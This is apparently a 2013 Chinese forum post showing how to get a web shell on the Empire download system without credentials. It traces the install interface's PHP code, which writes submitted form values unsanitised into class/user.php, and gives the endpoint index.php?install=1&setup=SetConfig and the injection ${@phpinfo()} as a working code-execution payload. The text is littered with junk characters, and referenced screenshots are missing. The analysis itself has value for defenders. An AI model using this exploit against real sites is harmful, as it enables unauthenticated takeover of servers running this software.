这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们: U( P3 }1 I0 N) b+ U/ y
( q b+ B5 E2 s7 T
0 R Q. J7 _, B0 }+ c这是帝国的一套下载系统 如图5 l& [$ C4 {/ ~
ps(不需要任何账户和密码,直接写shell)
. b/ h" X, z. G) _) Z: g# q# x0 i( E由于很多站是由于下载要整合discuz 等等一些论坛....
@$ w: U- ^4 Y( s& n
# n+ Y6 m9 g2 o8 h而帝国他又有一个万能接口,如图 ! [4 H9 W8 r! V- J6 Q* O8 _
# D6 q: M, y+ }
7 i2 d' ?* L6 f% Q' m8 E而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码- q1 l4 {! _* v$ u6 H
]9 E, C$ J) c( }
当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig 1. if($_GET['install']==1) 2. { 3. @include("../class/connect.php"); 4. @include("../class/db_sql.php"); 5. @include("../class/functions.php"); 6. $link=db_connect(); 7. $empire=new mysqlquery(); 8. if($setup=="SetConfig") 9. { 10. SetUserCOMConfig($_POST); 11. } 12. elseif($setup=="alter") 13. { 14. InstallUserCOM(); 15. } 16. elseif($setup=="update") 17. { 18. UpdateUserCOM(); 19. } 20. else 21. {} 复制代码 他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪
4 l4 q5 X& r7 w/ `& [7 C* H% l$ q8 {% Z5 l3 N9 G/ P
在data/fun.php中的15行. `2 A, l9 Z. {/ d
% C2 y# [! g/ N; o7 o! K8 P我们可以看到这个函数 1. function SetUserCOMConfig($add){ 2. $filetext=ReadFiletext('data/user.php'); 3. if(empty($filetext)) 4. { 5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.'); 6. } 7. $vr=explode(",",ReturnRepUserVar()); 8. $count=count($vr); 9. for($i=0;$i<$count;$i++) 10. { 11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext); 12. } 13. //写入配置文件 14. $fp=@fopen("../class/user.php","w"); 15. if(!$fp) 16. {, N& I: t J; w/ k7 e* z. A M( O
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 18. } 19. @fputs($fp,$filetext); 20. @fclose($fp); 复制代码 .....//省略若干 F7 i' {! I6 T1 |5 K
T8 ], v. W s3 O+ E3 Q
这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
( h: l/ e0 O+ N1 d, W5 C5 i- H/ r( c4 o
他将传进来的变量进行了切割,然后赋给了$filetext
; O: P$ j' V; E" j' V3 v( G4 e
' y6 L& p, |) I! A5 j3 s$ e然后看下面 1. //写入配置文件 2. $fp=@fopen("../class/user.php","w"); 3. if(!$fp) 4. { 5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 6. } 7. @fputs($fp,$filetext); 复制代码 打开了一个class/user.php文件,然后将$filetext写入了
; x8 Z8 Z4 P1 |! n$ g
2 _# C) D* L/ N" K我们看看写入的结果,随便填一个 - E0 p5 V3 j9 p8 _# @8 L$ Y( w: W
/ y# n$ N1 z. ?( U: Y$ g* e) F, u; m: g
+ V# t# P8 |% k" F7 ~) L" u* z- q" v' `% o; ?8 N
! U1 d9 k, S% |3 N% X* S$ K' Y7 t- h
, b' n( ]2 R( r1 _
9 P9 A- M8 q) h" z% K- a+ I' m' [& X4 J' \: _
, O% f# N6 w8 L9 m6 b
7 `( ^" u" f2 C2 U3 X
. N& \; }; ? i. z% {
' W) M' b7 ~" Q3 F- |/ V; |
* h, O8 j P$ i% T( y
* m0 W3 W8 j' |% t3 u: M* |
/ h) ]/ |+ s, ^6 `; V3 a8 ?% |& t8 X+ D- {- B! L
w p2 Q+ {9 W# _. X9 x
& B6 r+ f1 u# ^8 h' p, [. V; A9 L: q: j5 h
# c0 l$ L* O3 x9 k+ \5 E' g% c8 V; ?( g0 g2 L
所以我们淫荡点,写个${@phpinfo()}试试 4 U# Z5 u" J3 e* A2 w0 X
然后访问以下class/user.php这个文件' N; j; @+ N$ S1 N, |; I
日了吧
1 S: A* ~+ k8 s5 t
4 e6 v3 M2 D1 U/ S% p7 `, j. A- y- q" G
% Q( H" D7 E6 i B( E$ O: [( n1 q
. a& G2 q$ V* S, d, ~1 l5 }
$ B, C6 E9 h* o7 }. f( o
( s; m/ e* b9 e6 [$ u8 t$ K | 
发表于 2013-1-23 09:34:37
收藏
支持
反对